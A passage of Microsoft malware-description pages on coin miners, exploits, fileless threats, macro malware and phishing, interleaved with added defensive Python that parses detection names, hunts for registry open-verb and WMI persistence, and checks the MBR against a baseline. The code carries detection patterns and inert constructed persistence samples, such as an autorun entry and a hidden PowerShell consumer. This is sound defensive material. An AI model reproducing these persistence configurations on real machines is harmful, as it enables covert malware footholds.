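    r"^(?P<type>[A-Za-z]+):(?P<platform>[A-Za-z0-9_]+)/(?P<family>[A-Za-z0-9_-]+)"
    r"(?:\.(?P<variant>[A-Z]+))?(?P<suffixes>(?:[.!@][a-z]+)*)$"
)


@dataclass
class DetectionName:
    type: str
    platform: str
    family: str
    variant: Optional[str]
    suffixes: List[str]
    warnings: List[str] = field(default_factory=list)


def variant_order(variant: str) -> int:
    """Sequence number of a variant letter: A=1 ... Z=26, AA=27, so .AF > .AE."""
    order = 0
    for letter in variant:
        order = order * 26 + (ord(letter) - ord("A") + 1)
    return order


def parse_detection_name(name: str) -> Optional[DetectionName]:
    """Return the parsed components, or None if the name does not fit the format."""
    match = NAME_RE.match(name.strip())
    if match is None:
        return None
    suffixes = re.findall(r"[.!@][a-z]+", match.group("suffixes"))
    parsed = DetectionName(match.group("type"), match.group("platform"),
                           match.group("family"), match.group("variant"), suffixes)
    if parsed.type not in TYPES:
        parsed.warnings.append(f"unknown type: {parsed.type}")
    if parsed.platform not in PLATFORMS:
        parsed.warnings.append(f"unknown platform: {parsed.platform}")
    for suffix in suffixes:
        if suffix not in SUFFIXES:
            parsed.warnings.append(f"unknown suffix: {suffix}")
    return parsed


def describe(name: str) -> str:
    """One-line reading of a name, e.g. for an analyst's triage notes."""
    parsed = parse_detection_name(name)
    if parsed is None:
        return f"{name}: not a Type:Platform/Family name"
    parts = [f"type={parsed.type}", f"platform={parsed.platform}",
             f"family={parsed.family}"]
    if parsed.variant:
        parts.append(f"variant={parsed.variant} (#{variant_order(parsed.variant)})")
    parts += [f"{s} = {SUFFIXES.get(s, 'unlisted suffix')}" for s in parsed.suffixes]
    return "; ".join(parts + parsed.warnings)


if __name__ == "__main__":
    for sample in ("Trojan:Win32/Reveton.T!lnk", "Exploit:O97M/DDEDownloader.PA",
                   "Trojan:PowerShell/Maponeir.A", "Worm:Win32/Foo.gen@mm"):
        print(describe(sample))
```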
Coin miners
4/8/2019

Cybercriminals are always looking for new ways to make money. With the rise of digital currencies, also known as
cryptocurrencies, criminals see a unique opportunity to infiltrate an organization and secretly mine for coins by
reconfiguring malware.

How coin miners work


Many infections start with:
Email messages with attachments that try to install malware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install coin miners.
Websites taking advantage of computer processing power by running scripts while users browse the
website.
Mining is the process of running complex mathematical calculations necessary to maintain the blockchain ledger.
This process generates coins but requires significant computing resources.
Coin miners are not inherently malicious. Some individuals and organizations invest in hardware and electric
power for legitimate coin mining operations. However, others look for alternative sources of computing power and
try to find their way into corporate networks. These coin miners are not wanted in enterprise environments
because they eat up precious computing resources.
Cybercriminals see an opportunity to make money by running malware campaigns that distribute, install, and run
trojanized miners at the expense of other people’s computing resources.
Examples
DDE exploits, which have been known to distribute ransomware, are now delivering miners.
For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:
7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is installed by
Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE exploit.
The exploit launches a cmdlet that executes a malicious PowerShell script (Trojan:PowerShell/Maponeir.A), which
then downloads the trojanized miner: a modified version of the miner XMRig, which mines Monero
cryptocurrency.

How to protect against coin miners


Enable PUA detection: Some coin mining tools are not considered malware but are detected as potentially
unwanted applications (PUA). Many applications detected as PUA can negatively impact machine performance and
employee productivity. In enterprise environments, you can stop adware, torrent downloaders, and coin mining by
enabling PUA detection.
Since coin miners are becoming a popular payload in many different kinds of attacks, see general tips on how to
prevent malware infection.
For more information on coin miners, see the blog post Invisible resource thieves: The increasing threat of
cryptocurrency miners.
Exploits and exploit kits
4/8/2019

Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your software that malware
can use to get onto your device. Malware exploits these vulnerabilities to bypass your computer's security
safeguards to infect your device.

How exploits and exploit kits work


Exploits are often the first part of a larger attack. Hackers scan for outdated systems that contain critical
vulnerabilities, which they then exploit by deploying targeted malware. Exploits often include what's called
"shellcode". This is a small malware payload that's used to download additional malware from attacker-controlled
networks. This allows hackers to infect devices and infiltrate organizations.
Exploit kits are more comprehensive tools that contain a collection of exploits. These kits scan devices for different
kinds of software vulnerabilities and, if any are detected, deploy additional malware to further infect the device. Kits
can use exploits targeting a variety of software, including Adobe Flash Player, Adobe Reader, Internet Explorer,
Oracle Java and Sun Java.
The most common method used by attackers to distribute exploits and exploit kits is through webpages, but
exploits can also arrive in emails. Some websites unknowingly and unwillingly host malicious code and exploits in
their ads.
The infographic below shows how an exploit kit might attempt to exploit a device when a compromised webpage
is visited.

Figure 1. Example of how exploit kits work


Several notable threats, including WannaCry, exploit the Server Message Block (SMB) vulnerability CVE-2017-0144
to launch malware.
Examples of exploit kits:
Angler / Axpergle
Neutrino
Nuclear
To learn more about exploits, read this blog post on taking apart a double zero-day sample discovered in joint
hunt with ESET.

How we name exploits


We categorize exploits in our Malware encyclopedia by the "platform" they target. For example,
Exploit:Java/CVE-2013-1489.A is an exploit that targets a vulnerability in Java.
A project called "Common Vulnerabilities and Exposures (CVE)" is used by many security software vendors. The
project gives each vulnerability a unique number, for example, CVE-2016-0778. The portion "2016" refers to the
year the vulnerability was discovered. The "0778" is a unique ID for this specific vulnerability.
You can read more on the CVE website.
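As an added example, not part of this documentation or of any Microsoft tool, the Python below parses detection names of the Type:Platform/Family.Variant shape quoted above and pulls CVE identifiers out of them and out of free text, the kind of normalization a SOC script does before correlating alerts against patch data. The name grammar is inferred from the examples on this page and is an assumption; the list of sample names and the alert sentence are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Detection names on this page look like Type:Platform/Family.Variant
# (Exploit:Java/CVE-2013-1489.A, Trojan:PowerShell/Maponeir.A). The grammar
# below is inferred from those examples and is an assumption of this example.
THREAT_NAME_RE = re.compile(
    r"^(?P<type>[A-Za-z]+):(?P<platform>[A-Za-z0-9_]+)/"
    r"(?P<family>[A-Za-z0-9_.-]+?)(?:\.(?P<variant>[A-Za-z0-9!]+))?$"
)
# CVE-<year>-<sequence>; the sequence has at least four digits.
CVE_RE = re.compile(r"\bCVE-(?P<year>\d{4})-(?P<id>\d{4,})\b", re.IGNORECASE)


@dataclass(frozen=True)
class ThreatName:
    type: str            # Exploit, Trojan, Ransom, ...
    platform: str        # Java, Win32, PowerShell, O97M, ...
    family: str          # family name, or the CVE the exploit targets
    variant: Optional[str]
    cve: Optional[str]   # set when the family is a CVE identifier


def parse_threat_name(name: str) -> ThreatName:
    """Split a detection name into its components; raise on anything else."""
    m = THREAT_NAME_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Type:Platform/Family[.Variant] name: {name!r}")
    cve = CVE_RE.search(m.group("family"))
    return ThreatName(
        type=m.group("type"),
        platform=m.group("platform"),
        family=m.group("family"),
        variant=m.group("variant"),
        cve=cve.group(0).upper() if cve else None,
    )


def parse_cve(cve_id: str) -> Tuple[int, int]:
    """Return (year, sequence number) for an identifier such as CVE-2016-0778."""
    m = CVE_RE.fullmatch(cve_id.strip())
    if m is None:
        raise ValueError(f"not a CVE identifier: {cve_id!r}")
    return int(m.group("year")), int(m.group("id"))


def extract_cves(text: str) -> List[str]:
    """Unique, sorted CVE identifiers mentioned in free text (alert descriptions, advisories)."""
    return sorted({m.group(0).upper() for m in CVE_RE.finditer(text)})


def exploits_by_platform(names: List[str]) -> Dict[str, int]:
    """Count Exploit detections per targeted platform, skipping names that do not parse."""
    counts: Counter = Counter()
    for name in names:
        try:
            parsed = parse_threat_name(name)
        except ValueError:
            continue
        if parsed.type.lower() == "exploit":
            counts[parsed.platform] += 1
    return dict(counts)


# Constructed sample: detection names quoted on this page plus one malformed entry.
SAMPLE_NAMES = [
    "Exploit:Java/CVE-2013-1489.A",
    "Exploit:O97M/DDEDownloader.PA",
    "Trojan:PowerShell/Maponeir.A",
    "Trojan:Win32/Coinminer",
    "not a detection name",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES[:-1]:
        print(parse_threat_name(n))
    print(exploits_by_platform(SAMPLE_NAMES))
    print(extract_cves("WannaCry uses CVE-2017-0144; Petya also uses cve-2017-0145."))
```

The family part is matched lazily so that a dotted variant suffix (".A", ".PA") is split off while a family that is itself a CVE identifier stays intact; names that do not fit the shape raise rather than being silently mis-parsed.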

How to protect against exploits


The best prevention for exploits is to keep your organization's software up to date. Software vendors provide
updates for many known vulnerabilities and making sure these updates are applied to all devices is an important
step to prevent malware.
For more general tips, see prevent malware infection.
Fileless threats
4/8/2019 • 10 minutes to read

What exactly is a fileless threat? The term "fileless" suggests a threat that does not come in a file, such as a
backdoor that lives only in the memory of a machine. However, there's no generally accepted definition. The term
is used broadly; it's also used to describe malware families that do rely on files in order to operate.
Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral
movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while
others may involve the filesystem in some form or another.
To shed light on this loaded term, we grouped fileless threats into different categories.

Figure 1. Comprehensive diagram of fileless malware


We can classify fileless threats by their entry point, which indicates how fileless malware can arrive on a machine:
via an exploit; through compromised hardware; or via regular execution of applications and scripts.
Next, we can list the form of entry point: for example, exploits can be based on files or network data; PCI
peripherals are a type of hardware vector; and scripts and executables are sub-categories of the execution vector.
Finally, we can classify the host of the infection: for example, a Flash application that may contain an exploit; a
simple executable; a malicious firmware from a hardware device; or an infected MBR, which could bootstrap the
execution of a malware before the operating system even loads.
This helps us divide and categorize the various kinds of fileless threats. Clearly, the categories are not all the same:
some are more dangerous but also more difficult to implement, while others are more commonly used despite (or
precisely because of) not being very advanced.
From this categorization, we can glean three big types of fileless threats based on how large a footprint they may
leave on infected machines.

Type I: No file activity performed


A completely fileless malware can be considered one that never requires writing a file on the disk. How would such
malware infect a machine in the first place? An example scenario could be a target machine receiving malicious
network packets that exploit the EternalBlue vulnerability, leading to the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there is no file or any data written on a file.
Another scenario could involve compromised devices, where malicious code could be hiding in device firmware
(such as a BIOS), a USB peripheral (like the BadUSB attack), or even in the firmware of a network card. All these
examples do not require a file on the disk in order to run and can theoretically live only in memory, surviving even
reboots, disk reformats, and OS reinstalls.
Infections of this type can be extra difficult to detect and remediate. Antivirus products usually don’t have the
capability to access firmware for inspection; even if they did, it would be extremely challenging to detect and
remediate threats at this level. Because this type of fileless malware requires high levels of sophistication and often
depends on a particular hardware or software configuration, it’s not an attack vector that can be exploited easily and
reliably. For this reason, while extremely dangerous, threats of this type tend to be very uncommon and not
practical for most attacks.

Type II: Indirect file activity


There are other ways that malware can achieve a fileless presence on a machine without requiring significant
engineering effort. Fileless malware of this type doesn’t directly write files to the file system, but it can end up
using files indirectly. This is the case for the Poshspy backdoor. Attackers installed a malicious PowerShell command
within the WMI repository and configured a WMI filter to run that command periodically.
Such an installation can be carried out from the command line, without the backdoor ever having to exist as a file
in the first place. The malware can thus be installed and theoretically run without ever touching the file
system.
system. However, the WMI repository is stored on a physical file that is a central storage area managed by the CIM
Object Manager and usually contains legitimate data. Therefore, while the infection chain does technically use a
physical file, for practical purposes it’s considered a fileless attack given that the WMI repository is a multi-purpose
data container that cannot be simply detected and removed.

Type III: Files required to operate


Some malware achieves a form of fileless persistence but still needs files in order to operate. An
example of this scenario is Kovter, which creates a shell open verb handler in the registry for a random file
extension. This means that opening a file with that extension leads to the execution of a script through
the legitimate tool mshta.exe.
Figure 2. Kovter’s registry key
When the open verb is invoked, the associated command from the registry is launched, which results in the
execution of a small script. This script reads data from a further registry key and executes it, in turn leading to the
loading of the final payload. However, to trigger the open verb in the first place, Kovter has to drop a file with the
same extension targeted by the verb (in the example above, the extension is .bbf5590fd). It also has to set an auto-
run key configured to open such file when the machine starts.
Despite the use of files, and despite the fact that the registry too is stored in physical files, Kovter is considered a
fileless threat because the file system is of no practical use: the files with random extension contain junk data that is
not usable in verifying the presence of the threat, and the files that store the registry are containers that cannot be
detected and deleted if malicious content is present.
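The two patterns just described, the WMI filter and consumer pair of Type II and the registry open-verb handler for a random extension with its autorun entry of Type III, can be hunted for in exported data. The following Python is an added example written for this page, not Microsoft's or Windows Defender's own detection logic: it parses a constructed .reg-style export and a constructed set of root\subscription records (on a real machine these would come from a registry export and a WMI query of that namespace) and flags extension handlers and event consumers that hand control to a script interpreter. The extension baseline, the script-host list and the "random extension" heuristic are assumptions of the example.

```python
import re
from typing import Dict, List

# Script interpreters named on this page (mshta.exe, wscript.exe, powershell.exe) and close
# relatives; a handler or consumer whose command starts one of these deserves a second look.
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "pwsh"}
# Small baseline of ordinary extensions, constructed for this example (not a Microsoft list).
COMMON_EXTENSIONS = {".txt", ".exe", ".dll", ".doc", ".docx", ".xls", ".pdf", ".hta", ".js",
                     ".vbs", ".ps1", ".bat", ".cmd", ".lnk", ".jpg", ".png", ".zip"}
HKCR = "HKEY_CLASSES_ROOT\\"
RUN_KEY = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg-style export into {key_path: {value_name: data}}; '@' is the default value."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            keys[current][name.strip().strip('"')] = data.strip().strip('"').replace("\\\\", "\\")
    return keys


def executable_name(command: str) -> str:
    """Lower-case base name of the program a command line starts, without its .exe suffix."""
    m = re.match(r'\s*"?([^"\s]+)', command)
    if m is None:
        return ""
    return re.sub(r"\.exe$", "", m.group(1).replace("/", "\\").rsplit("\\", 1)[-1].lower())


def random_looking_extension(ext: str) -> bool:
    """Heuristic: an unknown extension that is long or carries digits (Kovter used .bbf5590fd)."""
    body = ext.lower().lstrip(".")
    return ext.lower() not in COMMON_EXTENSIONS and (len(body) >= 6 or any(c.isdigit() for c in body))


def find_open_verb_hijacks(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Type III: a made-up extension whose open verb runs a script host, plus the autorun
    entry that opens a file with that extension at startup."""
    findings: List[str] = []
    hijacked: List[str] = []
    for path, values in keys.items():
        if not path.startswith(HKCR + "."):
            continue
        ext = path[len(HKCR):]
        progid = values.get("@", "")
        command = keys.get(f"{HKCR}{progid}\\shell\\open\\command", {}).get("@", "")
        if random_looking_extension(ext) and executable_name(command) in SCRIPT_HOSTS:
            hijacked.append(ext.lower())
            findings.append(f"open verb for {ext} runs {executable_name(command)}: {command}")
    for name, data in keys.get(RUN_KEY, {}).items():
        if any(data.lower().endswith(ext) for ext in hijacked):
            findings.append(f"Run value {name!r} starts a file with a hijacked extension: {data}")
    return findings


def find_wmi_script_consumers(filters: List[dict], consumers: List[dict], bindings: List[dict]) -> List[str]:
    """Type II: an event filter bound to a CommandLineEventConsumer that launches a script host."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {c["Name"]: c for c in consumers}
    findings: List[str] = []
    for b in bindings:
        flt, con = by_filter.get(b["Filter"]), by_consumer.get(b["Consumer"])
        if flt is None or con is None:
            continue
        host = executable_name(con.get("CommandLineTemplate", ""))
        if host in SCRIPT_HOSTS:
            findings.append(f"WMI binding {b['Filter']} -> {b['Consumer']} runs {host} on: {flt['Query']}")
    return findings


# Constructed registry export: one hijacked extension, one ordinary one, and the autorun entry.
REG_SAMPLE = r"""
[HKEY_CLASSES_ROOT\.bbf5590fd]
@="bbf5590fd_auto_file"
[HKEY_CLASSES_ROOT\bbf5590fd_auto_file\shell\open\command]
@="mshta javascript:constructed_inert_sample"
[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="notepad.exe %1"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Users\\Public\\9d3e.bbf5590fd"
"""
# Constructed root\subscription records; bindings reference filters and consumers by Name here
# for brevity, whereas real __FilterToConsumerBinding instances hold full object paths.
WMI_FILTERS = [{"Name": "PerfFilter", "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
               "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}]
WMI_CONSUMERS = [{"Name": "PerfConsumer", "CommandLineTemplate":
                  "powershell.exe -NoProfile -WindowStyle Hidden -Command constructed_inert_sample"},
                 {"Name": "BackupNotify", "CommandLineTemplate": r"C:\Tools\notify.exe backup-done"}]
WMI_BINDINGS = [{"Filter": "PerfFilter", "Consumer": "PerfConsumer"},
                {"Filter": "PerfFilter", "Consumer": "BackupNotify"}]
```

Both checks key on the same question the text raises: which legitimate interpreter does the persistence hand control to, and from which multi-purpose container (the registry or the WMI repository) is it launched. A finding is a reason to pull the referenced script content for analysis, since, as the text notes, the container itself cannot simply be deleted.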

Categorizing fileless threats by infection host


Having described the broad categories, we can now dig into the details and provide a breakdown of the infection
hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It
drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure
malware does not get the upper hand in the arms race.
Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the operating system, the
browser, the Java engine, the Flash engine, etc. in order to execute a shellcode and deliver a payload in memory.
While the payload is fileless, the initial entry vector is a file.
Network-based (Type I): A network communication that takes advantage of a vulnerability in the target machine
can achieve code execution in the context of an application or the kernel. An example is WannaCry, which exploits a
previously fixed vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.
Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network cards require chipsets and
dedicated software to function. Software residing and running in the chipset of a device is called firmware.
Although a complex task, the firmware can be infected by malware, as the Equation espionage group has been
caught doing.
CPU-based (Type I): Modern CPUs are extremely complex and may include subsystems running firmware for
management purposes. Such firmware may be vulnerable to hijacking and allow the execution of malicious code
that would hence operate from within the CPU. In December 2017, two researchers reported a vulnerability that
can allow attackers to execute code inside the Management Engine (ME) present in any modern CPU from Intel.
Meanwhile, the attacker group PLATINUM has been observed to have the capability to use Intel's Active
Management Technology (AMT) to perform invisible network communications bypassing the installed operating
system. ME and AMT are essentially autonomous micro-computers that live inside the CPU and that operate at a
very low level. Because these technologies’ purpose is to provide remote manageability, they have direct access to
hardware, are independent of the operating system, and can run even if the computer is turned off. Besides being
vulnerable at the firmware level, CPUs could be manufactured with backdoors inserted directly in the hardware
circuitry. This attack has been researched and proved possible in the past. Just recently it has been reported that
certain models of x86 processors contain a secondary embedded RISC-like CPU core that can effectively provide a
backdoor through which regular applications can gain privileged execution.
USB-based (Type I): USB devices of all kinds can be reprogrammed with a malicious firmware capable of
interacting with the operating system in nefarious ways. This is the case of the BadUSB technique, demonstrated
a few years ago, which allows a reprogrammed USB stick to act as a keyboard that sends commands to machines via
keystrokes, or as a network card that can redirect traffic at will.
BIOS-based (Type I): A BIOS is a firmware running inside a chipset. It executes when a machine is powered on,
initializes the hardware, and then transfers control to the boot sector. It’s a very important component that operates
at a very low level and executes before the boot sector. It’s possible to reprogram the BIOS firmware with
malicious code, as has happened in the past with the Mebromi rootkit.
Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing the operating system to
create robust virtual machines. A virtual machine runs in a confined, simulated environment, and is in theory
unaware of the emulation. A malware taking over a machine may implement a small hypervisor in order to hide
itself outside of the realm of the running operating system. Malware of this kind has been theorized in the past, and
eventually real hypervisor rootkits have been observed, although very few are known to date.
Execution and injection
File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard execution vector. A simple
executable can be launched as a first-stage malware to run an additional payload in memory or inject it into other
legitimate running processes.
Macro-based (Type III: Office documents): The VBA language is a flexible and powerful tool designed to automate
editing tasks and add dynamic functionality to documents. As such, it can be abused by attackers to carry out
malicious operations like decoding, running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG. Macros are executed within the context of an Office process (e.g.,
Winword.exe), and they’re implemented in a scripting language, so there is no binary executable that an antivirus
can inspect. While Office apps require explicit consent from the user to execute macros from a document, attackers
use social engineering techniques to trick users into allowing macros to execute.
Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and PowerShell scripting
languages are available by default on Windows platforms. Scripts have the same advantages as macros: they’re
textual files (not binary executables) and they run within the context of the interpreter (e.g., wscript.exe,
powershell.exe, etc.), which is a clean and legitimate component. Scripts are very versatile; they can be run from a
file (e.g., by double-clicking them) or, in some cases, executed directly on the command line of an interpreter. Being
able to run on the command line allows malware to store malicious command-line scripts as auto-start
services, inside autorun registry keys, or as WMI event subscriptions in the WMI repository. Furthermore, an attacker
who has gained access to an infected machine may type the script directly at the command prompt.
Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume and contains executable
code required to start the boot process of the operating system. Threats like Petya are capable of infecting the Boot
Record by overwriting it with malicious code, so that when the machine is booted the malware immediately gains
control (and in the case of Petya, with disastrous consequences). The Boot Record resides outside the file system,
but it’s accessible by the operating system, and modern antivirus products have the capability to scan and restore it.
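Because the Boot Record resides outside the file system but is readable by the operating system, a defender can baseline it and detect an overwrite of the kind Petya performs. The following Python is an added example written for this page, not Microsoft's boot sector protection: it decodes the classic 512-byte MBR layout (446 bytes of boot code, four 16-byte partition entries, the 0x55AA signature), records hashes of the boot code and partition table while the machine is known-good, and reports what changed later. The sector contents are constructed; on a real system the 512 bytes would be read from the raw disk device or a disk image, which needs administrator rights and is outside this example.

```python
import hashlib
import struct
from typing import Dict, List

SECTOR_SIZE = 512
BOOT_CODE_END = 446      # bootstrap code occupies bytes 0..445
TABLE_END = 510          # four 16-byte partition entries occupy 446..509
MBR_SIGNATURE = 0xAA55   # bytes 0x55 0xAA at offsets 510..511, read little-endian


def parse_mbr(sector: bytes) -> Dict:
    """Decode the classic MBR layout: boot code, four partition entries, 0x55AA signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    partitions: List[Dict] = []
    for i in range(4):
        entry = sector[BOOT_CODE_END + 16 * i: BOOT_CODE_END + 16 * (i + 1)]
        lba_start, sector_count = struct.unpack_from("<II", entry, 8)
        if entry[4] != 0:  # partition type 0 marks an empty slot
            partitions.append({"index": i, "bootable": entry[0] == 0x80, "type": entry[4],
                               "lba_start": lba_start, "sectors": sector_count})
    return {
        "signature_ok": struct.unpack_from("<H", sector, TABLE_END)[0] == MBR_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_END]).hexdigest(),
        "partition_table_sha256": hashlib.sha256(sector[BOOT_CODE_END:TABLE_END]).hexdigest(),
        "partitions": partitions,
    }


def baseline_of(sector: bytes) -> Dict[str, str]:
    """Hashes to record while the machine is known-good (keep them off the machine)."""
    parsed = parse_mbr(sector)
    return {"boot_code_sha256": parsed["boot_code_sha256"],
            "partition_table_sha256": parsed["partition_table_sha256"]}


def check_mbr(sector: bytes, baseline: Dict[str, str]) -> List[str]:
    """Compare the current sector against the baseline; an empty list means no change."""
    parsed = parse_mbr(sector)
    findings: List[str] = []
    if not parsed["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if parsed["boot_code_sha256"] != baseline["boot_code_sha256"]:
        findings.append("boot code differs from baseline (possible Boot Record overwrite)")
    if parsed["partition_table_sha256"] != baseline["partition_table_sha256"]:
        findings.append("partition table differs from baseline")
    return findings


def build_mbr(boot_code: bytes, partitions: List[Dict]) -> bytes:
    """Assemble a sector from boot code and partition entries (CHS fields left zero)."""
    code = boot_code[:BOOT_CODE_END].ljust(BOOT_CODE_END, b"\x00")
    table = b""
    for p in partitions:
        table += bytes([0x80 if p["bootable"] else 0x00, 0, 0, 0, p["type"], 0, 0, 0])
        table += struct.pack("<II", p["lba_start"], p["sectors"])
    return code + table.ljust(TABLE_END - BOOT_CODE_END, b"\x00") + b"\x55\xAA"


# Constructed samples: a "known-good" sector and one whose boot code has been replaced.
SAMPLE_PARTITIONS = [{"bootable": True, "type": 0x07, "lba_start": 2048, "sectors": 204800}]
GOOD_BOOT_CODE = b"\xEB\x3C\x90" + b"CONSTRUCTED-SAMPLE-BOOTSTRAP"
TAMPERED_BOOT_CODE = b"\xE9\x00\x00" + b"CONSTRUCTED-SAMPLE-OVERWRITE"

if __name__ == "__main__":
    good = build_mbr(GOOD_BOOT_CODE, SAMPLE_PARTITIONS)
    base = baseline_of(good)
    print("good:", check_mbr(good, base))
    print("tampered:", check_mbr(build_mbr(TAMPERED_BOOT_CODE, SAMPLE_PARTITIONS), base))
```

Hashing the boot code and the partition table separately matters in practice: legitimate tools change the partition table (resizing, adding a volume) without touching the boot code, so the two findings deserve different triage.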

Defeating fileless malware


At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that
continuously enhance Windows security and mitigate classes of threats. We instrument durable protections that
are effective against a wide range of threats. Through AntiMalware Scan Interface (AMSI), behavior monitoring,
memory scanning, and boot sector protection, Windows Defender Advanced Threat Protection (Windows
Defender ATP) can inspect fileless threats even with heavy obfuscation. Machine learning technologies in the cloud
allow us to scale these protections against new and emerging threats.
To learn more, read: Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and
next-gen AV
Macro malware
4/8/2019 • 2 minutes to read

Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive.
However, macro malware uses this functionality to infect your device.

How macro malware works


Macro malware hides in Microsoft Office files and is delivered as email attachments or inside ZIP files. These files
use names that are intended to entice or scare people into opening them. They often look like invoices, receipts,
legal documents, and more.
Macro malware was fairly common several years ago because macros ran automatically whenever a document
was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware
authors need to convince users to turn on macros so that their malware can run. They do this by showing fake
warnings when a malicious document is opened.
We've seen macro malware download threats from the following families:
Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue

How to protect against macro malware


Make sure macros are disabled in your Microsoft Office applications. In enterprises, IT admins set the
default setting for macros:
Enable or disable macros in Office documents
Don’t open suspicious emails or suspicious attachments.
Delete any emails from unknown people or with suspicious content. Spam emails are the main way macro
malware spreads.
Enterprises can prevent macro malware from running executable content using ASR rules.
For more general tips, see prevent malware infection.
Phishing
4/8/2019 • 9 minutes to read

Phishing attacks attempt to steal sensitive information through emails, websites, text messages, or other forms of
electronic communication that often look to be official communication from legitimate companies or individuals.
The information that phishers (as the cybercriminals behind phishing attacks are called) attempt to steal can be
user names and passwords, credit card details, bank account information, or other credentials. Attackers can then
use stolen information for malicious purposes, such as hacking, identity theft, or stealing money directly from bank
accounts and credit cards. Phishers can also sell the information in cybercriminal underground marketplaces.

How phishing works


Phishing attacks are scams that often use social engineering bait or lure content. For example, during tax season,
bait content involves tax-filing announcements that attempt to lure you into providing your personal information
such as your Social Security number or bank account information.
Legitimate-looking communication, usually email, that links to a phishing site is one of the most common methods
used in phishing attacks. The phishing site typically mimics sign-in pages that require users to input login
credentials and account information. The phishing site then captures the sensitive information as soon as the user
provides it, giving attackers access to the information.
Another common phishing technique is the use of emails that direct you to open a malicious attachment, for
example a PDF file. The attachment often contains a message asking you to provide login credentials to another
site such as email or file sharing websites to open the document. When you access these phishing sites using your
login credentials, the attacker now has access to your information and can gain additional personal information
about you.

Phishing trends and techniques


Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an outstanding invoice from a
known vendor or company and provides a link for you to access and pay your invoice. When you access the site,
the attacker is poised to steal your personal information and funds.
Payment/delivery scam
You are asked to provide a credit card or other personal information so that your payment information can be
updated with a commonly known vendor or supplier. The update is requested so that you can take delivery of your
ordered goods. Generally, you may be familiar with the company and have likely done business with them in the
past, but you are not aware of any items you have recently purchased from them.
Tax-themed phishing scams
A common IRS phishing scam is one in which an urgent email letter is sent indicating that you owe money to the
IRS. Often the email threatens legal action if you do not access the site in a timely manner and pay your taxes.
When you access the site, the attackers can steal your personal credit card or bank information and drain your
accounts.
Downloads
Another frequently-used phishing scam is one in which an attacker sends a fraudulent email requesting you to
open or download a document, often one requiring you to sign in.
Phishing emails that deliver other threats
Phishing emails can be very effective, so attackers also use them to distribute ransomware through links or
attachments. When run, the ransomware encrypts files and displays a ransom note, which asks you to
pay a sum of money to regain access to your files.
We have also seen phishing emails that have links to tech support scam websites, which use various scare tactics
to trick you into calling hotlines and paying for unnecessary "technical support services" that supposedly fix
contrived device, platform, or software problems.

Targeted attacks against enterprises


Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure content. To perform spear
phishing, attackers will typically do reconnaissance work, surveying social media and other information sources
about their intended target.
Spear phishing may involve tricking you into logging into fake sites and divulging credentials. Spear phishing may
also be designed to lure you into opening documents by clicking on links that automatically install malware. With
this malware in place, attackers can remotely manipulate the infected computer.
The implanted malware serves as the point of entry for a more sophisticated attack known as an advanced
persistent threat (APT). APTs are generally designed to establish control and steal data over extended periods. As
part of the attack, attackers often try to deploy more covert hacking tools, move laterally to other computers,
compromise or create privileged accounts, and regularly exfiltrate information from compromised networks.
Whaling
Whaling is a form of phishing in which the attack is directed at high-level or senior executives within specific
companies with the direct goal of gaining access to their credentials and/or bank information. The content of the
email may be written as a legal subpoena, customer complaint, or other executive issue. This type of attack can
also lead to an APT attack within an organization. When the links or attachments are opened, they can give the
attacker access to credentials and other personal information, or launch malware that leads to an APT.
Business email compromise
Business email compromise (BEC) is a sophisticated scam that targets businesses often working with foreign
suppliers and businesses that regularly perform wire transfer payments. One of the most common schemes used
by BEC attackers involves gaining access to a company’s network through a spear phishing attack, where the
attacker creates a domain similar to the company they are targeting or spoofs their email to scam users into
releasing personal account information for money transfers.

How to protect against phishing attacks


Social engineering attacks are designed to take advantage of a user's possible lapse in decision-making. Be aware
